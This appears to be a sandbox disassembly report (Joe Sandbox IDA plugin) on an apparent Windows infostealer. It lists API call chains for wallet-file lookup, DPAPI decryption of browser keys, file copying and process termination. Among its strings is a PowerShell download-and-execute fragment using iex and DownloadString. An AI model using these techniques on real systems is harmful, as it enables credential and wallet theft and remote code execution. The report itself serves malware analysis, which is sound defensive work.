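Two decoded values are worth reading off the output: the 0x04000100 passed to InternetOpenUrlA is INTERNET_FLAG_NO_CACHE_WRITE|INTERNET_FLAG_PRAGMA_NOCACHE, so the fetch leaves no WinINet cache entry on disk, and the 0x20119 passed to RegOpenKeyExA on HKEY_LOCAL_MACHINE is KEY_READ|KEY_WOW64_64KEY, so this 32-bit image deliberately reads the 64-bit registry view when it looks up CurrentBuildNumber. The label table is intentionally small; extend BEHAVIOURS and DECODERS with whatever APIs matter for the family under review.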
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                               • Associated: same 14 associated memory dumps as listed for the first function above (identical for every function in this snapshot)
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: String___crt$Typememset
                              • String ID:
                              • API String ID: 3530896902-3916222277
                              • Opcode ID: 84268b1ad298be141965cb09840faa80c05a9f29c4795f6405255f78dbacafda
                              • Instruction ID: dde0d97991ba85ab3273650200a911997b3d2f2319e593d62762c1ed6dfff324
                              • Opcode Fuzzy Hash: 84268b1ad298be141965cb09840faa80c05a9f29c4795f6405255f78dbacafda
                              • Instruction Fuzzy Hash: 734109B110075C5EDB218B24CE84FFB7BED9F45704F1484E8EACA86182D2719A84CF20
                              APIs
                              • lstrcat.KERNEL32(?,013BDA10), ref: 009F47DB
                                • Part of subcall function 009F8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 009F8E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 009F4801
                              • lstrcat.KERNEL32(?,?), ref: 009F4820
                              • lstrcat.KERNEL32(?,?), ref: 009F4834
                              • lstrcat.KERNEL32(?,013AB090), ref: 009F4847
                              • lstrcat.KERNEL32(?,?), ref: 009F485B
                              • lstrcat.KERNEL32(?,013BD098), ref: 009F486F
                                • Part of subcall function 009FA740: lstrcpy.KERNEL32(00A00E17,00000000), ref: 009FA788
                                • Part of subcall function 009F8D90: GetFileAttributesA.KERNEL32(00000000,?,009E1B54,?,?,00A0564C,?,?,00A00E1F), ref: 009F8D9F
                                • Part of subcall function 009F4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 009F4580
                                • Part of subcall function 009F4570: RtlAllocateHeap.NTDLL(00000000), ref: 009F4587
                                • Part of subcall function 009F4570: wsprintfA.USER32 ref: 009F45A6
                                • Part of subcall function 009F4570: FindFirstFileA.KERNEL32(?,?), ref: 009F45BD
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                              • String ID:
                              • API String ID: 2540262943-0
                              • Opcode ID: 586a93dae123e6c764739c1792895929a7b7c6363e59f3db7f182b3eccaa1a6f
                              • Instruction ID: e2a18aa806067e540de0e06401faf1af181c3640ca81748fc9efb3e8110293dd
                              • Opcode Fuzzy Hash: 586a93dae123e6c764739c1792895929a7b7c6363e59f3db7f182b3eccaa1a6f
                              • Instruction Fuzzy Hash: CB3152B691020CA7CB64F7A0DC85FFE737CAB98700F404989B31996091EEB4D6C98B95
                              APIs
                                • Part of subcall function 009FA740: lstrcpy.KERNEL32(00A00E17,00000000), ref: 009FA788
                                • Part of subcall function 009FA9B0: lstrlen.KERNEL32(?,013B8BA0,?,\Monero\wallet.keys,00A00E17), ref: 009FA9C5
                                • Part of subcall function 009FA9B0: lstrcpy.KERNEL32(00000000), ref: 009FAA04
                                • Part of subcall function 009FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009FAA12
                                • Part of subcall function 009FA920: lstrcpy.KERNEL32(00000000,?), ref: 009FA972
                                • Part of subcall function 009FA920: lstrcat.KERNEL32(00000000), ref: 009FA982
                                • Part of subcall function 009FA8A0: lstrcpy.KERNEL32(?,00A00E17), ref: 009FA905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 009F2D85
                              Strings
                              • ')", xrefs: 009F2CB3
                              • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 009F2CC4
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 009F2D04
                              • <, xrefs: 009F2D39
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                              • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              • API String ID: 3031569214-898575020
                              • Opcode ID: bdd8892b12d404737b64f86a6d6e3dd43819624a4cd4000e0d409fda0daf2560
                              • Instruction ID: dd68069fc90e05308d4c63021c77f11b73846e97cc057e6ddde78c788115707a
                              • Opcode Fuzzy Hash: bdd8892b12d404737b64f86a6d6e3dd43819624a4cd4000e0d409fda0daf2560
                              • Instruction Fuzzy Hash: FD41DEB1C1020C9ADB14FBA0D891FFDB778AF50340F508529E60AB6195DFB46A4ACF95
                              APIs
                              • LocalAlloc.KERNEL32(00000040,?), ref: 009E9F41
                                • Part of subcall function 009FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009FA7E6
                                • Part of subcall function 009FA740: lstrcpy.KERNEL32(00A00E17,00000000), ref: 009FA788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$AllocLocal
                              • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                              • API String ID: 4171519190-1096346117
                              • Opcode ID: 7fd7b61b614f23b814510594a2eef70a89741877e2aa803ede93bb4313ca5198
                              • Instruction ID: a4d2412cd751410a9624f7ba339de1f8dae6cfd55a7c574b95324b7dac8ca5cd
                              • Opcode Fuzzy Hash: 7fd7b61b614f23b814510594a2eef70a89741877e2aa803ede93bb4313ca5198
                              • Instruction Fuzzy Hash: B6613D70A1024CEBDB24EFA5DC96FED7775AF85340F008518FA0A5B191EB746E06CB92
                              APIs
                              • GetSystemTime.KERNEL32(?), ref: 009F696C
                              • sscanf.NTDLL ref: 009F6999
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 009F69B2
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 009F69C0
                              • ExitProcess.KERNEL32 ref: 009F69DA
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Time$System$File$ExitProcesssscanf
                              • String ID:
                              • API String ID: 2533653975-0
                              • Opcode ID: 17d1dbb232d87ecc6f432e4bb35f9d44c423cc1e7fdc54f50cf6bc0e20de2081
                              • Instruction ID: f7c88c56ad898810eeea9a2be7d84991a68a886c51effb0223502d4cc43cee1c
                              • Opcode Fuzzy Hash: 17d1dbb232d87ecc6f432e4bb35f9d44c423cc1e7fdc54f50cf6bc0e20de2081
                              • Instruction Fuzzy Hash: 6521BAB5D1420DABCF14EFE4D945AEEB7B9FF48300F04852AE506E3250EB749605CB69
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009F7E37
                              • RtlAllocateHeap.NTDLL(00000000), ref: 009F7E3E
                              • RegOpenKeyExA.ADVAPI32(80000002,013AB968,00000000,00020119,?), ref: 009F7E5E
                              • RegQueryValueExA.ADVAPI32(?,013BD058,00000000,00000000,000000FF,000000FF), ref: 009F7E7F
                              • RegCloseKey.ADVAPI32(?), ref: 009F7E92
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: 02f06138fff38b358333d12940d01ec407fb7aa692641ea8db018d444cd32c1a
                              • Instruction ID: 12030fba642e6abda3c07835d29880e4d7522a40f0a7ec895a018394ba16b9ec
                              • Opcode Fuzzy Hash: 02f06138fff38b358333d12940d01ec407fb7aa692641ea8db018d444cd32c1a
                              • Instruction Fuzzy Hash: 68118CB1A44209EBD714CFD4DD4AFBFBBB8EB08B10F10411AF705A7690D77858018BA1
                              APIs
                              • StrStrA.SHLWAPI(013BDAA0,?,?,?,009F140C,?,013BDAA0,00000000), ref: 009F926C
                              • lstrcpyn.KERNEL32(00C2AB88,013BDAA0,013BDAA0,?,009F140C,?,013BDAA0), ref: 009F9290
                              • lstrlen.KERNEL32(?,?,009F140C,?,013BDAA0), ref: 009F92A7
                              • wsprintfA.USER32 ref: 009F92C7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpynlstrlenwsprintf
                              • String ID: %s%s
                              • API String ID: 1206339513-3252725368
                              • Opcode ID: ba840bbc01bbde31365793f3def5058cafc17425279a016dea39b572cabd1452
                              • Instruction ID: c611e630df0855522565870bb7ba65a26649e9fe1c87019fdcd08b1889c4ba8a
                              • Opcode Fuzzy Hash: ba840bbc01bbde31365793f3def5058cafc17425279a016dea39b572cabd1452
                              • Instruction Fuzzy Hash: DA0104B5500208FFCB08DFECD988FAE7BB9EB48350F108548F9098B640CA31AA41DB91
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009E12B4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 009E12BB
                              • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 009E12D7
                              • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 009E12F5
                              • RegCloseKey.ADVAPI32(?), ref: 009E12FF
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: bd548097c6c1e85f017480c2602a83255c7ad369a16907291d7411364fda7931
                              • Instruction ID: 57b873a9164fb87cbf991245edd3063a5e5a3feedd96edd5d1579019d637ee73
                              • Opcode Fuzzy Hash: bd548097c6c1e85f017480c2602a83255c7ad369a16907291d7411364fda7931
                              • Instruction Fuzzy Hash: 66011DB9A50208BBDB14DFE0DC49FAEB7B8FB48701F008159FA0597280D6719A018B51
                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 009F6663
                                • Part of subcall function 009FA740: lstrcpy.KERNEL32(00A00E17,00000000), ref: 009FA788
                                • Part of subcall function 009FA9B0: lstrlen.KERNEL32(?,013B8BA0,?,\Monero\wallet.keys,00A00E17), ref: 009FA9C5
                                • Part of subcall function 009FA9B0: lstrcpy.KERNEL32(00000000), ref: 009FAA04
                                • Part of subcall function 009FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009FAA12
                                • Part of subcall function 009FA8A0: lstrcpy.KERNEL32(?,00A00E17), ref: 009FA905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 009F6726
                              • ExitProcess.KERNEL32 ref: 009F6755
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                              • String ID: <
                              • API String ID: 1148417306-4251816714
                              • Opcode ID: 0b370ce0bff0fb3cd535763e995ee7a6801521d2ab89e1e5c6848ada719ef86d
                              • Instruction ID: bdd57626d593f558c7b29ca8930b1255998050f2648821db4820f6f510b73e9f
                              • Opcode Fuzzy Hash: 0b370ce0bff0fb3cd535763e995ee7a6801521d2ab89e1e5c6848ada719ef86d
                              • Instruction Fuzzy Hash: F531FDF1811218ABDB54EB90DC95FEE7778AF44300F404199F30966191DFB46B89CF5A
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00A00E28,00000000,?), ref: 009F882F
                              • RtlAllocateHeap.NTDLL(00000000), ref: 009F8836
                              • wsprintfA.USER32 ref: 009F8850
                                • Part of subcall function 009FA740: lstrcpy.KERNEL32(00A00E17,00000000), ref: 009FA788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesslstrcpywsprintf
                              • String ID: %dx%d
                              • API String ID: 1695172769-2206825331
                              • Opcode ID: 3bdc3a8c24c914be0f677d6d37b1e20401ff20b706e10bbc1afc3d99d1ab36e8
                              • Instruction ID: 39856c79739bbd84612d761b7fa46b96acc32c66d0b392b0ea564e6560fc7096
                              • Opcode Fuzzy Hash: 3bdc3a8c24c914be0f677d6d37b1e20401ff20b706e10bbc1afc3d99d1ab36e8
                              • Instruction Fuzzy Hash: 95214FB5E50208AFDB14DF94DD49FAEBBB8FB48B01F104119F605A76C0C779A901CBA1
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,009F951E,00000000), ref: 009F8D5B
                              • RtlAllocateHeap.NTDLL(00000000), ref: 009F8D62
                              • wsprintfW.USER32 ref: 009F8D78
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesswsprintf
                              • String ID: %hs
                              • API String ID: 769748085-2783943728
                              • Opcode ID: 5e0a1ded90bf0a9126d28a232b0d0def58cd64a41befafb06e3887adcc5c3949
                              • Instruction ID: 2aab4c59f68854f644855d119563bce45caeaf873a50a17157e553dcb23bde68
                              • Opcode Fuzzy Hash: 5e0a1ded90bf0a9126d28a232b0d0def58cd64a41befafb06e3887adcc5c3949
                              • Instruction Fuzzy Hash: F1E08CB0A50308BBD720DB94EC0AF6D77B8EB04702F004094FE0987680DA719E018B96
                              APIs
                                • Part of subcall function 009FA740: lstrcpy.KERNEL32(00A00E17,00000000), ref: 009FA788
                                • Part of subcall function 009FA9B0: lstrlen.KERNEL32(?,013B8BA0,?,\Monero\wallet.keys,00A00E17), ref: 009FA9C5
                                • Part of subcall function 009FA9B0: lstrcpy.KERNEL32(00000000), ref: 009FAA04
                                • Part of subcall function 009FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009FAA12
                                • Part of subcall function 009FA8A0: lstrcpy.KERNEL32(?,00A00E17), ref: 009FA905
                                • Part of subcall function 009F8B60: GetSystemTime.KERNEL32(00A00E1A,013B9A98,00A005AE,?,?,009E13F9,?,0000001A,00A00E1A,00000000,?,013B8BA0,?,\Monero\wallet.keys,00A00E17), ref: 009F8B86
                                • Part of subcall function 009FA920: lstrcpy.KERNEL32(00000000,?), ref: 009FA972
                                • Part of subcall function 009FA920: lstrcat.KERNEL32(00000000), ref: 009FA982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 009EA2E1
                              • lstrlen.KERNEL32(00000000,00000000), ref: 009EA3FF
                              • lstrlen.KERNEL32(00000000), ref: 009EA6BC
                                • Part of subcall function 009FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009FA7E6
                              • DeleteFileA.KERNEL32(00000000), ref: 009EA743
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 79e7f86c2e9365a26e993668470722c6dfeab65f6ad53f0e9ecf6c2e668f4d41
                              • Instruction ID: dcbe93bde13449cbde0539d693abdefdcfe9ed9b9e17e34f483688a8e1bafc6f
                              • Opcode Fuzzy Hash: 79e7f86c2e9365a26e993668470722c6dfeab65f6ad53f0e9ecf6c2e668f4d41
                              • Instruction Fuzzy Hash: 89E1D2B281010C9BDB15FBA4DC91FFE7338AF94340F508569F61A720A1EF706A49CB66
                              APIs
                                • Part of subcall function 009FA740: lstrcpy.KERNEL32(00A00E17,00000000), ref: 009FA788
                                • Part of subcall function 009FA9B0: lstrlen.KERNEL32(?,013B8BA0,?,\Monero\wallet.keys,00A00E17), ref: 009FA9C5
                                • Part of subcall function 009FA9B0: lstrcpy.KERNEL32(00000000), ref: 009FAA04
                                • Part of subcall function 009FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009FAA12
                                • Part of subcall function 009FA8A0: lstrcpy.KERNEL32(?,00A00E17), ref: 009FA905
                                • Part of subcall function 009F8B60: GetSystemTime.KERNEL32(00A00E1A,013B9A98,00A005AE,?,?,009E13F9,?,0000001A,00A00E1A,00000000,?,013B8BA0,?,\Monero\wallet.keys,00A00E17), ref: 009F8B86
                                • Part of subcall function 009FA920: lstrcpy.KERNEL32(00000000,?), ref: 009FA972
                                • Part of subcall function 009FA920: lstrcat.KERNEL32(00000000), ref: 009FA982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 009ED481
                              • lstrlen.KERNEL32(00000000), ref: 009ED698
                              • lstrlen.KERNEL32(00000000), ref: 009ED6AC
                              • DeleteFileA.KERNEL32(00000000), ref: 009ED72B
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 668544f5aa448384b207814a695410dfb5a02091ae44d10905ba54bce18fc9cf
                              • Instruction ID: a1053c2e23305bbbb78cb9df9e4ca4995b701eca00c1c37db78a4662c3434e35
                              • Opcode Fuzzy Hash: 668544f5aa448384b207814a695410dfb5a02091ae44d10905ba54bce18fc9cf
                              • Instruction Fuzzy Hash: 609114B181010C9BCB14FBA0DC92FFE7338AF94340F508568F60BA6091EF746A49CB66
                              APIs
                                • Part of subcall function 009FA740: lstrcpy.KERNEL32(00A00E17,00000000), ref: 009FA788
                                • Part of subcall function 009FA9B0: lstrlen.KERNEL32(?,013B8BA0,?,\Monero\wallet.keys,00A00E17), ref: 009FA9C5
                                • Part of subcall function 009FA9B0: lstrcpy.KERNEL32(00000000), ref: 009FAA04
                                • Part of subcall function 009FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009FAA12
                                • Part of subcall function 009FA8A0: lstrcpy.KERNEL32(?,00A00E17), ref: 009FA905
                                • Part of subcall function 009F8B60: GetSystemTime.KERNEL32(00A00E1A,013B9A98,00A005AE,?,?,009E13F9,?,0000001A,00A00E1A,00000000,?,013B8BA0,?,\Monero\wallet.keys,00A00E17), ref: 009F8B86
                                • Part of subcall function 009FA920: lstrcpy.KERNEL32(00000000,?), ref: 009FA972
                                • Part of subcall function 009FA920: lstrcat.KERNEL32(00000000), ref: 009FA982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 009ED801
                              • lstrlen.KERNEL32(00000000), ref: 009ED99F
                              • lstrlen.KERNEL32(00000000), ref: 009ED9B3
                              • DeleteFileA.KERNEL32(00000000), ref: 009EDA32
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 9fe95c3d71f1d958a4e695374f5ac630bf1c1cb9a000261340db2f0416381b61
                              • Instruction ID: 8684c4afaa39bb0a77a8fb1ebfcdefa79498c8e7acb47c65fdb7c5e1703429f1
                              • Opcode Fuzzy Hash: 9fe95c3d71f1d958a4e695374f5ac630bf1c1cb9a000261340db2f0416381b61
                              • Instruction Fuzzy Hash: 8D81F2B191010C9BDB14FBA4DC96FFE7339AF94340F504528F60BA60A1EF746A49CB66
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID:
                              • API String ID: 367037083-0
                              • Opcode ID: 0d84aaeab2d333217847dc39dde6d81664ac83d5622b641043842bec58cdb68c
                              • Instruction ID: 37c6aaacfdc2317d30b0968642f34e111c01db4bbb218ca9f3d64fcf548f7ab1
                              • Opcode Fuzzy Hash: 0d84aaeab2d333217847dc39dde6d81664ac83d5622b641043842bec58cdb68c
                              • Instruction Fuzzy Hash: E5411FB1D1010DEBCB04EFA4D846FFEB778BB54304F10C418E616A6290DB79AA05CFA5
                              APIs
                                • Part of subcall function 009FA740: lstrcpy.KERNEL32(00A00E17,00000000), ref: 009FA788
                                • Part of subcall function 009E99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009E99EC
                                • Part of subcall function 009E99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 009E9A11
                                • Part of subcall function 009E99C0: LocalAlloc.KERNEL32(00000040,?), ref: 009E9A31
                                • Part of subcall function 009E99C0: ReadFile.KERNEL32(000000FF,?,00000000,009E148F,00000000), ref: 009E9A5A
                                • Part of subcall function 009E99C0: LocalFree.KERNEL32(009E148F), ref: 009E9A90
                                • Part of subcall function 009E99C0: CloseHandle.KERNEL32(000000FF), ref: 009E9A9A
                                • Part of subcall function 009F8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 009F8E52
                              • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 009E9D39
                                • Part of subcall function 009E9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,009E4EEE,00000000,00000000), ref: 009E9AEF
                                • Part of subcall function 009E9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,009E4EEE,00000000,?), ref: 009E9B01
                                • Part of subcall function 009E9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,009E4EEE,00000000,00000000), ref: 009E9B2A
                                • Part of subcall function 009E9AC0: LocalFree.KERNEL32(?,?,?,?,009E4EEE,00000000,?), ref: 009E9B3F
                                • Part of subcall function 009E9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 009E9B84
                                • Part of subcall function 009E9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 009E9BA3
                                • Part of subcall function 009E9B60: LocalFree.KERNEL32(?), ref: 009E9BD3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                              • String ID: $"encrypted_key":"$DPAPI
                              • API String ID: 2100535398-738592651
                              • Opcode ID: 78cd8d56950b712a3873db40d0f102bece925a4a5f50cf764b806cb9fdbde22f
                              • Instruction ID: 598931ab74a4d1d9d9f3e784dbafb2781c5506f155c9a686771058c481619ea8
                              • Opcode Fuzzy Hash: 78cd8d56950b712a3873db40d0f102bece925a4a5f50cf764b806cb9fdbde22f
                              • Instruction Fuzzy Hash: 7B310DB5D1021DABCB15DBA5DC85BEEB7B8AB48304F144519F905A6281EB309E44CBA1
                              APIs
                              • memset.MSVCRT ref: 009F94EB
                                • Part of subcall function 009F8D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,009F951E,00000000), ref: 009F8D5B
                                • Part of subcall function 009F8D50: RtlAllocateHeap.NTDLL(00000000), ref: 009F8D62
                                • Part of subcall function 009F8D50: wsprintfW.USER32 ref: 009F8D78
                              • OpenProcess.KERNEL32(00001001,00000000,?), ref: 009F95AB
                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 009F95C9
                              • CloseHandle.KERNEL32(00000000), ref: 009F95D6
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                              • String ID:
                              • API String ID: 3729781310-0
                              • Opcode ID: 10f6a3e3a0461b212f35b72ba23df92326fb4bab74a12e2fa50a25aafad3ccab
                              • Instruction ID: 6d49e258dea99f3a9ea1ce3930eca63dea78a66720ea33b25a7730ed3d71d032
                              • Opcode Fuzzy Hash: 10f6a3e3a0461b212f35b72ba23df92326fb4bab74a12e2fa50a25aafad3ccab
                              • Instruction Fuzzy Hash: C8311CB1A1020C9FDB15DBE0CD49BEDB778EB44700F104459F606AA584DB74AA89CB51
                              APIs
                              • CreateFileA.KERNEL32(009F3AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,009F3AEE,?), ref: 009F92FC
                              • GetFileSizeEx.KERNEL32(000000FF,009F3AEE), ref: 009F9319
                              • CloseHandle.KERNEL32(000000FF), ref: 009F9327
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$CloseCreateHandleSize
                              • String ID:
                              • API String ID: 1378416451-0
                              • Opcode ID: 81a1dc644634bbdb86fc2c764c82e94eeb9796d7088ec1efcab2fb8e3309ed4d
                              • Instruction ID: 1ef5f720406261b24c8781b9607841aeddca41d2042fa4abf3fc14a106ee8219
                              • Opcode Fuzzy Hash: 81a1dc644634bbdb86fc2c764c82e94eeb9796d7088ec1efcab2fb8e3309ed4d
                              • Instruction Fuzzy Hash: 09F04F35E50208BBDF20DFB4DC49FAE77B9AB48710F20C654BA51A72C0DAB496018B44
                              APIs
                              • __getptd.LIBCMT ref: 009FC74E
                                • Part of subcall function 009FBF9F: __amsg_exit.LIBCMT ref: 009FBFAF
                              • __getptd.LIBCMT ref: 009FC765
                              • __amsg_exit.LIBCMT ref: 009FC773
                              • __updatetlocinfoEx_nolock.LIBCMT ref: 009FC797
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                              • String ID:
                              • API String ID: 300741435-0
                              • Opcode ID: 71f69bb8250617e28f1e536743f9e5ecf7f6ad3077d53516cc62477642fa83b9
                              • Instruction ID: b212c75c14880eb25b3bc7c57400c56a7140a18056e2fe73c0972ebf2aacbc9b
                              • Opcode Fuzzy Hash: 71f69bb8250617e28f1e536743f9e5ecf7f6ad3077d53516cc62477642fa83b9
                              • Instruction Fuzzy Hash: 12F090B290430C9BD720BFB89E06B7933A06F80720F248149F718AA1D2DB645941DF56
                              APIs
                                • Part of subcall function 009F8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 009F8E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 009F4F7A
                              • lstrcat.KERNEL32(?,00A01070), ref: 009F4F97
                              • lstrcat.KERNEL32(?,013B8A60), ref: 009F4FAB
                              • lstrcat.KERNEL32(?,00A01074), ref: 009F4FBD
